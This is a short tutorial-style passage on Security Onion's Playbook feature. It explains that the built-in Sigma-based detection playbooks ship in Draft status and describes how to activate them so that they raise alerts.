Playbook

Playbook has (as of time of writing) over 2000 detection playbooks built-in to the Security Onion. Detection playbooks are a combination of Sigma rules and actions to take upon a match. By default, all playbooks shipped with Security Onion are in a Draft status; to enable them, check all of them (using the top left check) and click a three-dot menu button on the right of one that’s highlighted, mouse over status and click Active. Once active and tripped, Playbooks typically generate alerts in the Alerts page.

New Plays can be created to build custom detections; this will be covered in future scenarios.